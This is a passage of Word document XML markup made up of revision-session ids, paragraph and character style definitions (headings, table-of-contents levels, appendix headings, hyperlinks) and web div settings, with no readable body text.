    <w:rsid w:val="00D77A9F"/>
    <w:rsid w:val="00D77C34"/>
    <w:rsid w:val="00D77CEB"/>
    <w:rsid w:val="00D80200"/>
    <w:rsid w:val="00D80AC0"/>
    <w:rsid w:val="00D80D7C"/>
    <w:rsid w:val="00D81261"/>
    <w:rsid w:val="00D81824"/>
    <w:rsid w:val="00D81EFA"/>
    <w:rsid w:val="00D82D25"/>
    <w:rsid w:val="00D85CBF"/>
    <w:rsid w:val="00D86C07"/>
    <w:rsid w:val="00D90CA5"/>
    <w:rsid w:val="00D92414"/>
    <w:rsid w:val="00D92F01"/>
    <w:rsid w:val="00D96C07"/>
    <w:rsid w:val="00DA0649"/>
    <w:rsid w:val="00DA24A4"/>
    <w:rsid w:val="00DA330B"/>
    <w:rsid w:val="00DA5851"/>
    <w:rsid w:val="00DA7544"/>
    <w:rsid w:val="00DB0788"/>
    <w:rsid w:val="00DB09F4"/>
    <w:rsid w:val="00DB1284"/>
    <w:rsid w:val="00DB171B"/>
    <w:rsid w:val="00DB36FD"/>
    <w:rsid w:val="00DB3D38"/>
    <w:rsid w:val="00DB4D50"/>
    <w:rsid w:val="00DB7974"/>
    <w:rsid w:val="00DB79B5"/>
    <w:rsid w:val="00DC24EE"/>
    <w:rsid w:val="00DC2D66"/>
    <w:rsid w:val="00DC3045"/>
    <w:rsid w:val="00DC3BB8"/>
    <w:rsid w:val="00DC4293"/>
    <w:rsid w:val="00DC5C9D"/>
    <w:rsid w:val="00DC6523"/>
    <w:rsid w:val="00DC7CAB"/>
    <w:rsid w:val="00DC7D11"/>
    <w:rsid w:val="00DD0816"/>
    <w:rsid w:val="00DD09B0"/>
    <w:rsid w:val="00DD1F88"/>
    <w:rsid w:val="00DD1FAC"/>
    <w:rsid w:val="00DD4111"/>
    <w:rsid w:val="00DD46F5"/>
    <w:rsid w:val="00DD4A99"/>
    <w:rsid w:val="00DD5DC8"/>
    <w:rsid w:val="00DD7744"/>
    <w:rsid w:val="00DE0672"/>
    <w:rsid w:val="00DE1C01"/>
    <w:rsid w:val="00DE356D"/>
    <w:rsid w:val="00DE38E6"/>
    <w:rsid w:val="00DE4245"/>
    <w:rsid w:val="00DE6522"/>
    <w:rsid w:val="00DE71C3"/>
    <w:rsid w:val="00DF070A"/>
    <w:rsid w:val="00DF09BC"/>
    <w:rsid w:val="00DF1D2D"/>
    <w:rsid w:val="00DF2914"/>
    <w:rsid w:val="00DF2B31"/>
    <w:rsid w:val="00DF3093"/>
    <w:rsid w:val="00DF397A"/>
    <w:rsid w:val="00DF39C0"/>
    <w:rsid w:val="00DF487A"/>
    <w:rsid w:val="00DF59F1"/>
    <w:rsid w:val="00DF5C6C"/>
    <w:rsid w:val="00DF5FA2"/>
    <w:rsid w:val="00DF711F"/>
    <w:rsid w:val="00E00522"/>
    <w:rsid w:val="00E0086E"/>
    <w:rsid w:val="00E008C4"/>
    <w:rsid w:val="00E01554"/>
    <w:rsid w:val="00E0220D"/>
    <w:rsid w:val="00E02B5D"/>
    <w:rsid w:val="00E03366"/>
    <w:rsid w:val="00E03CFF"/>
    <w:rsid w:val="00E0545E"/>
    <w:rsid w:val="00E101FE"/>
    <w:rsid w:val="00E17B7C"/>
    <w:rsid w:val="00E17C9D"/>
    <w:rsid w:val="00E17CC2"/>
    <w:rsid w:val="00E200F3"/>
    <w:rsid w:val="00E20322"/>
    <w:rsid w:val="00E21A04"/>
    <w:rsid w:val="00E22853"/>
    <w:rsid w:val="00E23592"/>
    <w:rsid w:val="00E2378A"/>
    <w:rsid w:val="00E237C6"/>
    <w:rsid w:val="00E24B2B"/>
    <w:rsid w:val="00E25B10"/>
    <w:rsid w:val="00E2680F"/>
    <w:rsid w:val="00E27C1B"/>
    <w:rsid w:val="00E30FAD"/>
    <w:rsid w:val="00E32331"/>
    <w:rsid w:val="00E32B30"/>
    <w:rsid w:val="00E338FC"/>
    <w:rsid w:val="00E34A89"/>
    <w:rsid w:val="00E357F6"/>
    <w:rsid w:val="00E3594D"/>
    <w:rsid w:val="00E35C52"/>
    <w:rsid w:val="00E40ABC"/>
    <w:rsid w:val="00E40D7B"/>
    <w:rsid w:val="00E41FEC"/>
    <w:rsid w:val="00E42795"/>
    <w:rsid w:val="00E43ADD"/>
    <w:rsid w:val="00E44449"/>
    <w:rsid w:val="00E44E5B"/>
    <w:rsid w:val="00E47B76"/>
    <w:rsid w:val="00E5018D"/>
    <w:rsid w:val="00E5132A"/>
    <w:rsid w:val="00E52169"/>
    <w:rsid w:val="00E521F7"/>
    <w:rsid w:val="00E52DF0"/>
    <w:rsid w:val="00E533BA"/>
    <w:rsid w:val="00E545CD"/>
    <w:rsid w:val="00E54EA3"/>
    <w:rsid w:val="00E55898"/>
    <w:rsid w:val="00E5642C"/>
    <w:rsid w:val="00E57FB1"/>
    <w:rsid w:val="00E610D9"/>
    <w:rsid w:val="00E61CF2"/>
    <w:rsid w:val="00E623C4"/>
    <w:rsid w:val="00E628F6"/>
    <w:rsid w:val="00E639A2"/>
    <w:rsid w:val="00E63DEA"/>
    <w:rsid w:val="00E64EE0"/>
    <w:rsid w:val="00E70E97"/>
    <w:rsid w:val="00E728C1"/>
    <w:rsid w:val="00E72A0A"/>
    <w:rsid w:val="00E731E0"/>
    <w:rsid w:val="00E7418F"/>
    <w:rsid w:val="00E74707"/>
    <w:rsid w:val="00E748C3"/>
    <w:rsid w:val="00E75380"/>
    <w:rsid w:val="00E75A22"/>
    <w:rsid w:val="00E76A45"/>
    <w:rsid w:val="00E8010A"/>
    <w:rsid w:val="00E8126D"/>
    <w:rsid w:val="00E817DB"/>
    <w:rsid w:val="00E84EC9"/>
    <w:rsid w:val="00E85796"/>
    <w:rsid w:val="00E86D44"/>
    <w:rsid w:val="00E874C6"/>
    <w:rsid w:val="00E902D8"/>
    <w:rsid w:val="00E902FA"/>
    <w:rsid w:val="00E9096C"/>
    <w:rsid w:val="00E91F86"/>
    <w:rsid w:val="00E9236C"/>
    <w:rsid w:val="00E93335"/>
    <w:rsid w:val="00E9532A"/>
    <w:rsid w:val="00E96C66"/>
    <w:rsid w:val="00E978CC"/>
    <w:rsid w:val="00EA008E"/>
    <w:rsid w:val="00EA0540"/>
    <w:rsid w:val="00EA7068"/>
    <w:rsid w:val="00EB001B"/>
    <w:rsid w:val="00EB0610"/>
    <w:rsid w:val="00EB06B5"/>
    <w:rsid w:val="00EB1177"/>
    <w:rsid w:val="00EB2104"/>
    <w:rsid w:val="00EB75FB"/>
    <w:rsid w:val="00EC09E6"/>
    <w:rsid w:val="00EC1493"/>
    <w:rsid w:val="00EC1689"/>
    <w:rsid w:val="00EC2C26"/>
    <w:rsid w:val="00EC2E4B"/>
    <w:rsid w:val="00EC403C"/>
    <w:rsid w:val="00EC4B49"/>
    <w:rsid w:val="00EC5040"/>
    <w:rsid w:val="00EC5098"/>
    <w:rsid w:val="00EC6D70"/>
    <w:rsid w:val="00EC7728"/>
    <w:rsid w:val="00EC7AD0"/>
    <w:rsid w:val="00EC7C0B"/>
    <w:rsid w:val="00EC7E44"/>
    <w:rsid w:val="00ED0542"/>
    <w:rsid w:val="00ED1D17"/>
    <w:rsid w:val="00ED23A8"/>
    <w:rsid w:val="00ED2594"/>
    <w:rsid w:val="00ED5880"/>
    <w:rsid w:val="00ED5A28"/>
    <w:rsid w:val="00ED5D68"/>
    <w:rsid w:val="00ED766B"/>
    <w:rsid w:val="00ED7D76"/>
    <w:rsid w:val="00EE0D23"/>
    <w:rsid w:val="00EE0D6D"/>
    <w:rsid w:val="00EE1530"/>
    <w:rsid w:val="00EE29C0"/>
    <w:rsid w:val="00EE3D49"/>
    <w:rsid w:val="00EE4EF7"/>
    <w:rsid w:val="00EE4FB3"/>
    <w:rsid w:val="00EE77AD"/>
    <w:rsid w:val="00EF1180"/>
    <w:rsid w:val="00EF1C75"/>
    <w:rsid w:val="00EF1C81"/>
    <w:rsid w:val="00EF1E61"/>
    <w:rsid w:val="00EF3909"/>
    <w:rsid w:val="00EF5B2A"/>
    <w:rsid w:val="00EF6B51"/>
    <w:rsid w:val="00EF728A"/>
    <w:rsid w:val="00EF76CF"/>
    <w:rsid w:val="00F006C6"/>
    <w:rsid w:val="00F04AD1"/>
    <w:rsid w:val="00F061A9"/>
    <w:rsid w:val="00F064DC"/>
    <w:rsid w:val="00F066B4"/>
    <w:rsid w:val="00F103B9"/>
    <w:rsid w:val="00F11AE8"/>
    <w:rsid w:val="00F12280"/>
    <w:rsid w:val="00F125AD"/>
    <w:rsid w:val="00F13818"/>
    <w:rsid w:val="00F14862"/>
    <w:rsid w:val="00F15272"/>
    <w:rsid w:val="00F158F0"/>
    <w:rsid w:val="00F16840"/>
    <w:rsid w:val="00F16C9D"/>
    <w:rsid w:val="00F200CC"/>
    <w:rsid w:val="00F21166"/>
    <w:rsid w:val="00F2132E"/>
    <w:rsid w:val="00F22831"/>
    <w:rsid w:val="00F23177"/>
    <w:rsid w:val="00F23A1F"/>
    <w:rsid w:val="00F24415"/>
    <w:rsid w:val="00F24521"/>
    <w:rsid w:val="00F258D7"/>
    <w:rsid w:val="00F25B4C"/>
    <w:rsid w:val="00F26597"/>
    <w:rsid w:val="00F26660"/>
    <w:rsid w:val="00F2677C"/>
    <w:rsid w:val="00F267E6"/>
    <w:rsid w:val="00F308BD"/>
    <w:rsid w:val="00F309DE"/>
    <w:rsid w:val="00F32000"/>
    <w:rsid w:val="00F35141"/>
    <w:rsid w:val="00F35DE8"/>
    <w:rsid w:val="00F37334"/>
    <w:rsid w:val="00F40617"/>
    <w:rsid w:val="00F41B68"/>
    <w:rsid w:val="00F423B5"/>
    <w:rsid w:val="00F42A95"/>
    <w:rsid w:val="00F44E68"/>
    <w:rsid w:val="00F46443"/>
    <w:rsid w:val="00F52709"/>
    <w:rsid w:val="00F52CDD"/>
    <w:rsid w:val="00F54427"/>
    <w:rsid w:val="00F5595F"/>
    <w:rsid w:val="00F55E8B"/>
    <w:rsid w:val="00F57E37"/>
    <w:rsid w:val="00F6109D"/>
    <w:rsid w:val="00F6295E"/>
    <w:rsid w:val="00F63536"/>
    <w:rsid w:val="00F63836"/>
    <w:rsid w:val="00F6445E"/>
    <w:rsid w:val="00F64BC8"/>
    <w:rsid w:val="00F65899"/>
    <w:rsid w:val="00F65B22"/>
    <w:rsid w:val="00F6742A"/>
    <w:rsid w:val="00F7052A"/>
    <w:rsid w:val="00F72402"/>
    <w:rsid w:val="00F73469"/>
    <w:rsid w:val="00F800D3"/>
    <w:rsid w:val="00F800DF"/>
    <w:rsid w:val="00F80381"/>
    <w:rsid w:val="00F808AD"/>
    <w:rsid w:val="00F81BC8"/>
    <w:rsid w:val="00F81F17"/>
    <w:rsid w:val="00F82488"/>
    <w:rsid w:val="00F826D1"/>
    <w:rsid w:val="00F83236"/>
    <w:rsid w:val="00F834DC"/>
    <w:rsid w:val="00F83851"/>
    <w:rsid w:val="00F8456E"/>
    <w:rsid w:val="00F8575D"/>
    <w:rsid w:val="00F85956"/>
    <w:rsid w:val="00F860E6"/>
    <w:rsid w:val="00F91C84"/>
    <w:rsid w:val="00F92B92"/>
    <w:rsid w:val="00F950F2"/>
    <w:rsid w:val="00F962CF"/>
    <w:rsid w:val="00F974EF"/>
    <w:rsid w:val="00F978F9"/>
    <w:rsid w:val="00FA016A"/>
    <w:rsid w:val="00FA3A2F"/>
    <w:rsid w:val="00FA3F0D"/>
    <w:rsid w:val="00FA6181"/>
    <w:rsid w:val="00FA6A0A"/>
    <w:rsid w:val="00FA713A"/>
    <w:rsid w:val="00FA71B1"/>
    <w:rsid w:val="00FA7A26"/>
    <w:rsid w:val="00FB03DB"/>
    <w:rsid w:val="00FB1281"/>
    <w:rsid w:val="00FB12EF"/>
    <w:rsid w:val="00FB171C"/>
    <w:rsid w:val="00FB3011"/>
    <w:rsid w:val="00FB3722"/>
    <w:rsid w:val="00FB3F04"/>
    <w:rsid w:val="00FB42C7"/>
    <w:rsid w:val="00FB6077"/>
    <w:rsid w:val="00FB78BB"/>
    <w:rsid w:val="00FB794B"/>
    <w:rsid w:val="00FB7A79"/>
    <w:rsid w:val="00FB7B72"/>
    <w:rsid w:val="00FC04D7"/>
    <w:rsid w:val="00FC1CA5"/>
    <w:rsid w:val="00FC24BB"/>
    <w:rsid w:val="00FC28F5"/>
    <w:rsid w:val="00FC3056"/>
    <w:rsid w:val="00FC3299"/>
    <w:rsid w:val="00FC48FE"/>
    <w:rsid w:val="00FC4A79"/>
    <w:rsid w:val="00FC65AF"/>
    <w:rsid w:val="00FC79E5"/>
    <w:rsid w:val="00FD1129"/>
    <w:rsid w:val="00FD1DF2"/>
    <w:rsid w:val="00FD1E15"/>
    <w:rsid w:val="00FD3F47"/>
    <w:rsid w:val="00FD5844"/>
    <w:rsid w:val="00FD64B4"/>
    <w:rsid w:val="00FD768E"/>
    <w:rsid w:val="00FD7ABE"/>
    <w:rsid w:val="00FE2DD5"/>
    <w:rsid w:val="00FE5935"/>
    <w:rsid w:val="00FF05BB"/>
    <w:rsid w:val="00FF1E4B"/>
    <w:rsid w:val="00FF256E"/>
    <w:rsid w:val="00FF2CE8"/>
    <w:rsid w:val="00FF3672"/>
    <w:rsid w:val="00FF4416"/>
    <w:rsid w:val="00FF5990"/>
    <w:rsid w:val="00FF6034"/>
    <w:rsid w:val="00FF66F5"/>
    <w:rsid w:val="00FF73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BDBC4"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{152077CA-03C3-493E-B671-B340005D4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6144"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:numId w:val="3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16144"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="3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16144"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="2"/>
        <w:numId w:val="31"/>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B16144"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="3"/>
        <w:numId w:val="3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B16144"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="4"/>
        <w:numId w:val="3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16144"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="5"/>
        <w:numId w:val="3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16144"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="6"/>
        <w:numId w:val="3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16144"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="7"/>
        <w:numId w:val="3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6144"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="8"/>
        <w:numId w:val="3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614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B16144"/>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16144"/>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B16144"/>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B16144"/>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16144"/>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16144"/>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16144"/>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6144"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B16144"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00D77CEB"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="FollowedHyperlink">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="007878A1"/>
    <w:rPr>
      <w:color w:val="954F72" w:themeColor="followedHyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BB17FF"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008536C8"/>
    <w:pPr>
      <w:spacing w:after="100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008536C8"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="220"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008536C8"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="440"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC4">
    <w:name w:val="toc 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008536C8"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="660"/>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00772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next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0042549C"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="880"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="002B0C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C44"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="002B0C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C44"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOCHeading">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="Heading1"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="007621CE"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="0"/>
      </w:numPr>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Appendix1">
    <w:name w:val="Appendix 1"/>
    <w:basedOn w:val="Heading1"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Appendix1Char"/>
    <w:qFormat/>
    <w:rsid w:val="00512BCC"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Appendix2">
    <w:name w:val="Appendix 2"/>
    <w:basedOn w:val="Heading2"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Appendix2Char"/>
    <w:qFormat/>
    <w:rsid w:val="007A6CF9"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="30"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Appendix1Char">
    <w:name w:val="Appendix 1 Char"/>
    <w:basedOn w:val="Heading1Char"/>
    <w:link w:val="Appendix1"/>
    <w:rsid w:val="00512BCC"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Appendix2Char">
    <w:name w:val="Appendix 2 Char"/>
    <w:basedOn w:val="Heading2Char"/>
    <w:link w:val="Appendix2"/>
    <w:rsid w:val="007A6CF9"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC6">
    <w:name w:val="toc 6"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00650BEB"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="1100"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC7">
    <w:name w:val="toc 7"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00650BEB"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="1320"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC8">
    <w:name w:val="toc 8"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00650BEB"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="1540"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC9">
    <w:name w:val="toc 9"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00650BEB"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="1760"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Emphasis">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="00327101"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Revision">
    <w:name w:val="Revision"/>
    <w:hidden/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00B8482C"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00A250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87970">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="182209406">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="233394460">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="249236382">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="290090241">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="347567395">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="352465931">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="427433406">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="753210950">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="180"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="2004426538">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
